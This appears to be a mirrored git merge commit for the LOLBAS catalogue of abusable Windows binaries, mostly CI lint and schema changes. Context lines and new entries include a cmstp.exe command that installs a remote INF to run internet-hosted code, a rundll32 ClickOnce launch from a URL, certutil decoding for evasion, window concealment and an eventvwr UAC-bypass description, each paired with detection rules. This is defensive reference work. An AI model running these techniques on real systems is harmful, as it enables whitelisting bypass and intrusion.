mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-28 15:58:24 +01:00
Merge remote-tracking branch 'upstream/master' into windows_11_sprint
This commit is contained in:
commit
67e1040172
8
.github/.yamllint
vendored
8
.github/.yamllint
vendored
@ -4,12 +4,12 @@ yaml-files:
|
|||||||
- '*.yml'
|
- '*.yml'
|
||||||
rules:
|
rules:
|
||||||
new-line-at-end-of-file:
|
new-line-at-end-of-file:
|
||||||
level: warning
|
level: error
|
||||||
trailing-spaces:
|
trailing-spaces:
|
||||||
level: warning
|
level: error
|
||||||
line-length:
|
line-length:
|
||||||
level: warning
|
level: warning
|
||||||
new-lines:
|
new-lines:
|
||||||
level: warning
|
level: error
|
||||||
indentation:
|
indentation:
|
||||||
level: warning
|
level: error
|
||||||
|
2
.github/workflows/gh-pages.yml
vendored
2
.github/workflows/gh-pages.yml
vendored
@ -16,7 +16,7 @@ jobs:
|
|||||||
|
|
||||||
- name: Change .yml to .md
|
- name: Change .yml to .md
|
||||||
run: |
|
run: |
|
||||||
for x in $(find yml/ -name '*.yml'); do mv "$x" "${x/%\.yml/.md}"; done
|
for x in $(find yml/ -name '*.yml'); do echo "---" >> "$x"; mv "$x" "${x/%\.yml/.md}"; done
|
||||||
mv yml/OSBinaries yml/Binaries
|
mv yml/OSBinaries yml/Binaries
|
||||||
mv yml/OSLibraries yml/Libraries
|
mv yml/OSLibraries yml/Libraries
|
||||||
mv yml/OSScripts yml/Scripts
|
mv yml/OSScripts yml/Scripts
|
||||||
|
34
.github/workflows/yaml-linting.yml
vendored
34
.github/workflows/yaml-linting.yml
vendored
@ -1,19 +1,35 @@
|
|||||||
---
|
---
|
||||||
name: YAML Lint
|
name: PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks
|
||||||
on:
|
on: [push,pull_request]
|
||||||
push:
|
|
||||||
branches:
|
|
||||||
- master
|
|
||||||
pull_request:
|
|
||||||
branches:
|
|
||||||
- master
|
|
||||||
|
|
||||||
jobs:
|
jobs:
|
||||||
lintFiles:
|
lintFiles:
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
steps:
|
steps:
|
||||||
- uses: actions/checkout@v1
|
- uses: actions/checkout@v3
|
||||||
- name: yaml-lint
|
- name: yaml-lint
|
||||||
uses: ibiqlik/action-yamllint@v3
|
uses: ibiqlik/action-yamllint@v3
|
||||||
with:
|
with:
|
||||||
|
no_warnings: true
|
||||||
|
file_or_dir: yml/**/*.yml
|
||||||
config_file: .github/.yamllint
|
config_file: .github/.yamllint
|
||||||
|
- name: Validate OSBinaries YAML Schema
|
||||||
|
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||||
|
with:
|
||||||
|
files: yml/OSBinaries/*.yml
|
||||||
|
schema: YML-Schema.yml
|
||||||
|
- name: Validate OSLibraries YAML Schema
|
||||||
|
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||||
|
with:
|
||||||
|
files: yml/OSLibraries/*.yml
|
||||||
|
schema: YML-Schema.yml
|
||||||
|
- name: Validate OSScripts YAML Schema
|
||||||
|
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||||
|
with:
|
||||||
|
files: yml/OSScripts/*.yml
|
||||||
|
schema: YML-Schema.yml
|
||||||
|
- name: Validate OtherMSBinaries YAML Schema
|
||||||
|
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||||
|
with:
|
||||||
|
files: yml/OtherMSBinaries/*.yml
|
||||||
|
schema: YML-Schema.yml
|
||||||
|
35
.github/yaml-lint-reviewdog.yml.bak
vendored
Normal file
35
.github/yaml-lint-reviewdog.yml.bak
vendored
Normal file
@ -0,0 +1,35 @@
|
|||||||
|
---
|
||||||
|
name: PULL_REQUEST - YAML Lint with Reviewdog & Schema Checks
|
||||||
|
on: [pull_request]
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
lintFiles:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
steps:
|
||||||
|
- uses: actions/checkout@v3
|
||||||
|
- name: Run yamllint
|
||||||
|
uses: reviewdog/action-yamllint@v1
|
||||||
|
with:
|
||||||
|
level: error
|
||||||
|
reporter: github-pr-review # Change reporter.
|
||||||
|
yamllint_flags: '--config-file .github/.yamllint yml/**/*.yml'
|
||||||
|
- name: Validate OSBinaries YAML Schema
|
||||||
|
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||||
|
with:
|
||||||
|
files: yml/OSBinaries/*.yml
|
||||||
|
schema: YML-Schema.yml
|
||||||
|
- name: Validate OSLibraries YAML Schema
|
||||||
|
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||||
|
with:
|
||||||
|
files: yml/OSLibraries/*.yml
|
||||||
|
schema: YML-Schema.yml
|
||||||
|
- name: Validate OSScripts YAML Schema
|
||||||
|
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||||
|
with:
|
||||||
|
files: yml/OSScripts/*.yml
|
||||||
|
schema: YML-Schema.yml
|
||||||
|
- name: Validate OtherMSBinaries YAML Schema
|
||||||
|
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||||
|
with:
|
||||||
|
files: yml/OtherMSBinaries/*.yml
|
||||||
|
schema: YML-Schema.yml
|
@ -25,4 +25,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Pierre-Alexandre Braeken
|
- Person: Pierre-Alexandre Braeken
|
||||||
Handle: '@pabraeken'
|
Handle: '@pabraeken'
|
||||||
---
|
|
||||||
|
@ -23,4 +23,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Bart
|
- Person: Bart
|
||||||
Handle: '@bartblaze'
|
Handle: '@bartblaze'
|
||||||
---
|
|
||||||
|
@ -15,4 +15,3 @@ Full_Path:
|
|||||||
- Path: '%localappdata%\Whatsapp\Update.exe'
|
- Path: '%localappdata%\Whatsapp\Update.exe'
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process'
|
- IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process'
|
||||||
---
|
|
||||||
|
@ -25,4 +25,3 @@ Acknowledgement:
|
|||||||
Handle: '@@vysecurity'
|
Handle: '@@vysecurity'
|
||||||
- Person: Adam (Internals)
|
- Person: Adam (Internals)
|
||||||
Handle: '@Hexacorn'
|
Handle: '@Hexacorn'
|
||||||
---
|
|
||||||
|
118
YML-Schema.yml
Normal file
118
YML-Schema.yml
Normal file
@ -0,0 +1,118 @@
|
|||||||
|
---
|
||||||
|
type: map
|
||||||
|
mapping:
|
||||||
|
# Id field enhancement possibility commenting out for now
|
||||||
|
# "Id":
|
||||||
|
# type: str
|
||||||
|
# required: true
|
||||||
|
# pattern: '[a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}'
|
||||||
|
"Name":
|
||||||
|
type: str
|
||||||
|
required: true
|
||||||
|
"Description":
|
||||||
|
type: str
|
||||||
|
required: true
|
||||||
|
"Aliases":
|
||||||
|
type: seq
|
||||||
|
required: false
|
||||||
|
sequence:
|
||||||
|
- type: map
|
||||||
|
mapping:
|
||||||
|
"Alias":
|
||||||
|
type: str
|
||||||
|
required: false
|
||||||
|
"Author":
|
||||||
|
type: str
|
||||||
|
required: true
|
||||||
|
"Created":
|
||||||
|
type: date
|
||||||
|
required: true
|
||||||
|
"Commands":
|
||||||
|
type: seq
|
||||||
|
required: true
|
||||||
|
sequence:
|
||||||
|
- type: map
|
||||||
|
mapping:
|
||||||
|
"Command":
|
||||||
|
type: str
|
||||||
|
required: true
|
||||||
|
"Description":
|
||||||
|
type: str
|
||||||
|
required: true
|
||||||
|
"Usecase":
|
||||||
|
type: str
|
||||||
|
required: true
|
||||||
|
"Category":
|
||||||
|
type: str
|
||||||
|
required: true
|
||||||
|
enum: [ADS, AWL Bypass, Compile, Conceal, Copy, Credentials, Decode, Download, Dump, Encode, Execute, Reconnaissance, Tamper, UAC Bypass, Upload]
|
||||||
|
"Privileges":
|
||||||
|
type: str
|
||||||
|
required: true
|
||||||
|
"MitreID":
|
||||||
|
type: str
|
||||||
|
required: true
|
||||||
|
pattern: '^T[0-9]{4}(\.[0-9]{3})?$'
|
||||||
|
"OperatingSystem":
|
||||||
|
type: str
|
||||||
|
required: true
|
||||||
|
"Full_Path":
|
||||||
|
type: seq
|
||||||
|
required: true
|
||||||
|
sequence:
|
||||||
|
- type: map
|
||||||
|
mapping:
|
||||||
|
"Path":
|
||||||
|
type: str
|
||||||
|
required: true
|
||||||
|
"Code_Sample":
|
||||||
|
type: seq
|
||||||
|
required: false
|
||||||
|
sequence:
|
||||||
|
- type: map
|
||||||
|
mapping:
|
||||||
|
"Code":
|
||||||
|
type: str
|
||||||
|
"Detection":
|
||||||
|
type: seq
|
||||||
|
required: false
|
||||||
|
sequence:
|
||||||
|
- type: map
|
||||||
|
mapping:
|
||||||
|
"IOC":
|
||||||
|
type: str
|
||||||
|
"Sigma":
|
||||||
|
type: str
|
||||||
|
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
|
||||||
|
"Analysis":
|
||||||
|
type: str
|
||||||
|
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
|
||||||
|
"Elastic":
|
||||||
|
type: str
|
||||||
|
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
|
||||||
|
"Splunk":
|
||||||
|
type: str
|
||||||
|
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
|
||||||
|
"BlockRule":
|
||||||
|
type: str
|
||||||
|
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
|
||||||
|
"Resources":
|
||||||
|
type: seq
|
||||||
|
required: false
|
||||||
|
sequence:
|
||||||
|
- type: map
|
||||||
|
mapping:
|
||||||
|
"Link":
|
||||||
|
type: str
|
||||||
|
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
|
||||||
|
"Acknowledgement":
|
||||||
|
type: seq
|
||||||
|
required: false
|
||||||
|
sequence:
|
||||||
|
- type: map
|
||||||
|
mapping:
|
||||||
|
"Person":
|
||||||
|
type: str
|
||||||
|
"Handle":
|
||||||
|
type: str
|
||||||
|
pattern: '^(@(\w){1,15})?$'
|
@ -1,11 +1,15 @@
|
|||||||
---
|
---
|
||||||
Name: Binary.exe
|
Name: Binary.exe
|
||||||
Description: Something general about the binary
|
Description: Something general about the binary
|
||||||
|
Aliases: # Optional field if any common aliases exist of the binary with nearly the same functionality,
|
||||||
|
- Alias: Binary64.exe # but for example, is built for different architecture.
|
||||||
Author: The name of the person that created this file
|
Author: The name of the person that created this file
|
||||||
Created: YYYY-MM-DD (date the person created this file)
|
Created: YYYY-MM-DD (date the person created this file)
|
||||||
Commands:
|
Commands:
|
||||||
- Command: The command
|
- Command: The command
|
||||||
Description: Description of the command
|
Description: Description of the command
|
||||||
|
Aliases:
|
||||||
|
- An alias for the command (example: ProcDump.exe & ProcDump64.exe)
|
||||||
Usecase: A description of the usecase
|
Usecase: A description of the usecase
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: Required privs
|
Privileges: Required privs
|
||||||
|
@ -20,4 +20,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Wade Hickey
|
- Person: Wade Hickey
|
||||||
Handle: '@notwhickey'
|
Handle: '@notwhickey'
|
||||||
---
|
|
||||||
|
@ -25,4 +25,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: cpl
|
- Person: cpl
|
||||||
Handle: '@cpl3h'
|
Handle: '@cpl3h'
|
||||||
---
|
|
@ -23,7 +23,7 @@ Detection:
|
|||||||
- IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
|
- IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://freddiebarrsmith.com/at.txt
|
- Link: https://freddiebarrsmith.com/at.txt
|
||||||
- Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator
|
- Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
|
||||||
- Link: https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
|
- Link: https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: 'Freddie Barr-Smith'
|
- Person: 'Freddie Barr-Smith'
|
||||||
@ -34,4 +34,3 @@ Acknowledgement:
|
|||||||
Handle:
|
Handle:
|
||||||
- Person: 'Xabier Ugarte-Pedrero'
|
- Person: 'Xabier Ugarte-Pedrero'
|
||||||
Handle:
|
Handle:
|
||||||
---
|
|
||||||
|
@ -14,8 +14,6 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Atbroker.exe
|
- Path: C:\Windows\System32\Atbroker.exe
|
||||||
- Path: C:\Windows\SysWOW64\Atbroker.exe
|
- Path: C:\Windows\SysWOW64\Atbroker.exe
|
||||||
Code_Sample:
|
|
||||||
- Code:
|
|
||||||
Detection:
|
Detection:
|
||||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml
|
||||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml
|
||||||
@ -27,4 +25,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Adam
|
- Person: Adam
|
||||||
Handle: '@hexacorn'
|
Handle: '@hexacorn'
|
||||||
---
|
|
||||||
|
@ -48,4 +48,3 @@ Acknowledgement:
|
|||||||
Handle: '@aionescu'
|
Handle: '@aionescu'
|
||||||
- Person: Asif Matadar
|
- Person: Asif Matadar
|
||||||
Handle: '@d1r4c'
|
Handle: '@d1r4c'
|
||||||
---
|
|
||||||
|
@ -46,7 +46,7 @@ Detection:
|
|||||||
- IOC: bitsadmin creates new files
|
- IOC: bitsadmin creates new files
|
||||||
- IOC: bitsadmin adds data to alternate data stream
|
- IOC: bitsadmin adds data to alternate data stream
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53
|
- Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679
|
||||||
- Link: https://www.youtube.com/watch?v=_8xJaaQlpBo
|
- Link: https://www.youtube.com/watch?v=_8xJaaQlpBo
|
||||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
@ -56,4 +56,3 @@ Acknowledgement:
|
|||||||
Handle: '@carnal0wnage'
|
Handle: '@carnal0wnage'
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
|
||||||
|
@ -34,4 +34,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Ensar Samil
|
- Person: Ensar Samil
|
||||||
Handle: '@sblmsrsn'
|
Handle: '@sblmsrsn'
|
||||||
---
|
|
||||||
|
@ -32,4 +32,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: David Middlehurst
|
- Person: David Middlehurst
|
||||||
Handle: '@dtmsecurity'
|
Handle: '@dtmsecurity'
|
||||||
---
|
|
||||||
|
@ -39,7 +39,7 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1140
|
MitreID: T1140
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||||
- Command: certutil --decodehex encoded_hexadecimal_InputFileName
|
- Command: certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName
|
||||||
Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
|
Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
|
||||||
Usecase: Decode files to evade defensive measures
|
Usecase: Decode files to evade defensive measures
|
||||||
Category: Decode
|
Category: Decode
|
||||||
@ -75,4 +75,3 @@ Acknowledgement:
|
|||||||
- Person: egre55
|
- Person: egre55
|
||||||
Handle: '@egre55'
|
Handle: '@egre55'
|
||||||
- Person: Lior Adar
|
- Person: Lior Adar
|
||||||
---
|
|
||||||
|
@ -21,8 +21,6 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\cmd.exe
|
- Path: C:\Windows\System32\cmd.exe
|
||||||
- Path: C:\Windows\SysWOW64\cmd.exe
|
- Path: C:\Windows\SysWOW64\cmd.exe
|
||||||
Code_Sample:
|
|
||||||
- Code:
|
|
||||||
Detection:
|
Detection:
|
||||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml
|
||||||
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml
|
||||||
@ -34,4 +32,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: r0lan
|
- Person: r0lan
|
||||||
Handle: '@yeyint_mth'
|
Handle: '@yeyint_mth'
|
||||||
---
|
|
||||||
|
@ -14,8 +14,6 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\cmdkey.exe
|
- Path: C:\Windows\System32\cmdkey.exe
|
||||||
- Path: C:\Windows\SysWOW64\cmdkey.exe
|
- Path: C:\Windows\SysWOW64\cmdkey.exe
|
||||||
Code_Sample:
|
|
||||||
- Code:
|
|
||||||
Detection:
|
Detection:
|
||||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml
|
||||||
Resources:
|
Resources:
|
||||||
@ -24,4 +22,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person:
|
- Person:
|
||||||
Handle:
|
Handle:
|
||||||
---
|
|
||||||
|
@ -23,4 +23,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Elliot Killick
|
- Person: Elliot Killick
|
||||||
Handle: '@elliotkillick'
|
Handle: '@elliotkillick'
|
||||||
---
|
|
||||||
|
@ -14,15 +14,13 @@ Commands:
|
|||||||
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
|
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
|
||||||
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
||||||
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
|
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
|
||||||
Category: AwL bypass
|
Category: AWL Bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218.003
|
MitreID: T1218.003
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\cmstp.exe
|
- Path: C:\Windows\System32\cmstp.exe
|
||||||
- Path: C:\Windows\SysWOW64\cmstp.exe
|
- Path: C:\Windows\SysWOW64\cmstp.exe
|
||||||
Code_Sample:
|
|
||||||
- Code:
|
|
||||||
Detection:
|
Detection:
|
||||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml
|
||||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml
|
||||||
@ -44,4 +42,3 @@ Acknowledgement:
|
|||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
- Person: Nick Tyrer
|
- Person: Nick Tyrer
|
||||||
Handle: '@NickTyrer'
|
Handle: '@NickTyrer'
|
||||||
---
|
|
||||||
|
@ -29,4 +29,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Ialle Teixeira
|
- Person: Ialle Teixeira
|
||||||
Handle: '@NtSetDefault'
|
Handle: '@NtSetDefault'
|
||||||
---
|
|
||||||
|
@ -24,4 +24,3 @@ Acknowledgement:
|
|||||||
Handle: '@hexacorn'
|
Handle: '@hexacorn'
|
||||||
- Person: Wietze
|
- Person: Wietze
|
||||||
Handle: '@wietze'
|
Handle: '@wietze'
|
||||||
---
|
|
||||||
|
@ -34,4 +34,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Jimmy
|
- Person: Jimmy
|
||||||
Handle: '@bohops'
|
Handle: '@bohops'
|
||||||
---
|
|
||||||
|
@ -34,4 +34,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person:
|
- Person:
|
||||||
Handle:
|
Handle:
|
||||||
---
|
|
||||||
|
@ -33,4 +33,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
|
||||||
|
23
yml/OSBinaries/CustomShellHost.yml
Normal file
23
yml/OSBinaries/CustomShellHost.yml
Normal file
@ -0,0 +1,23 @@
|
|||||||
|
---
|
||||||
|
Name: CustomShellHost.exe
|
||||||
|
Description: A host process that is used by custom shells when using Windows in Kiosk mode.
|
||||||
|
Author: 'Wietze Beukema'
|
||||||
|
Created: 2021-11-14
|
||||||
|
Commands:
|
||||||
|
- Command: CustomShellHost.exe
|
||||||
|
Description: Executes explorer.exe (with command-line argument /NoShellRegistrationCheck) if present in the current working folder.
|
||||||
|
Usecase: Can be used to evade defensive counter-measures
|
||||||
|
Category: Execute
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1218
|
||||||
|
OperatingSystem: Windows 10, Windows 11
|
||||||
|
Full_Path:
|
||||||
|
- Path: C:\Windows\System32\CustomShellHost.exe
|
||||||
|
Detection:
|
||||||
|
- IOC: CustomShellHost.exe is unlikely to run on normal workstations
|
||||||
|
Resources:
|
||||||
|
- Link: https://twitter.com/YoSignals/status/1381353520088113154
|
||||||
|
- Link: https://docs.microsoft.com/en-us/windows/configuration/kiosk-shelllauncher
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: John Carroll
|
||||||
|
Handle: '@YoSignals'
|
@ -27,4 +27,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Ialle Teixeira
|
- Person: Ialle Teixeira
|
||||||
Handle: '@NtSetDefault'
|
Handle: '@NtSetDefault'
|
||||||
---
|
|
||||||
|
@ -26,4 +26,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Gal Kristal
|
- Person: Gal Kristal
|
||||||
Handle: '@gal_kristal'
|
Handle: '@gal_kristal'
|
||||||
---
|
|
||||||
|
20
yml/OSBinaries/DeviceCredentialDeployment.yml
Normal file
20
yml/OSBinaries/DeviceCredentialDeployment.yml
Normal file
@ -0,0 +1,20 @@
|
|||||||
|
---
|
||||||
|
Name: DeviceCredentialDeployment.exe
|
||||||
|
Description: Device Credential Deployment
|
||||||
|
Author: 'Elliot Killick'
|
||||||
|
Created: '2021-08-16'
|
||||||
|
Commands:
|
||||||
|
- Command: DeviceCredentialDeployment
|
||||||
|
Description: Grab the console window handle and set it to hidden
|
||||||
|
Usecase: Can be used to stealthily run a console application (e.g. cmd.exe) in the background
|
||||||
|
Category: Conceal
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1564
|
||||||
|
OperatingSystem: Windows 10
|
||||||
|
Full_Path:
|
||||||
|
- Path: C:\Windows\System32\DeviceCredentialDeployment.exe
|
||||||
|
Detection:
|
||||||
|
- IOC: DeviceCredentialDeployment.exe should not be run on a normal workstation
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: Elliot Killick
|
||||||
|
Handle: '@elliotkillick'
|
@ -7,7 +7,7 @@ Commands:
|
|||||||
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
|
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
|
||||||
Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
|
Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
|
||||||
Usecase: Use binary to bypass Application whitelisting
|
Usecase: Use binary to bypass Application whitelisting
|
||||||
Category: AWL bypass
|
Category: AWL Bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1127
|
MitreID: T1127
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||||
@ -26,4 +26,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Casey Smith
|
- Person: Casey Smith
|
||||||
Handle: '@subtee'
|
Handle: '@subtee'
|
||||||
---
|
|
||||||
|
@ -35,4 +35,3 @@ Acknowledgement:
|
|||||||
Handle: '@tim8288'
|
Handle: '@tim8288'
|
||||||
- Person: Hai Vaknin
|
- Person: Hai Vaknin
|
||||||
Handle: '@vakninhai'
|
Handle: '@vakninhai'
|
||||||
---
|
|
||||||
|
@ -33,4 +33,3 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Jimmy
|
- Person: Jimmy
|
||||||
Handle: '@bohops'
|
Handle: '@bohops'
|
||||||
---
|
|
||||||
|
@ -32,4 +32,3 @@ Acknowledgement:
|
|||||||
Handle: '@dim0x69'
|
Handle: '@dim0x69'
|
||||||
- Person: Nikhil SamratAshok
|
- Person: Nikhil SamratAshok
|
||||||
Handle: '@nikhil_mitt'
|
Handle: '@nikhil_mitt'
|
||||||
---
|
|
||||||
|
@ -67,5 +67,4 @@ Acknowledgement:
|
|||||||
- Person: egre55
|
- Person: egre55
|
||||||
Handle: '@egre55'
|
Handle: '@egre55'
|
||||||
- Person: Mike Cary
|
- Person: Mike Cary
|
||||||
Handle: 'grayfold3d'
|
Handle: '@grayfold3d'
|
||||||
---
|
|
||||||
|
@ -7,7 +7,7 @@ Commands:
|
|||||||
- Command: eventvwr.exe
|
- Command: eventvwr.exe
|
||||||
Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
|
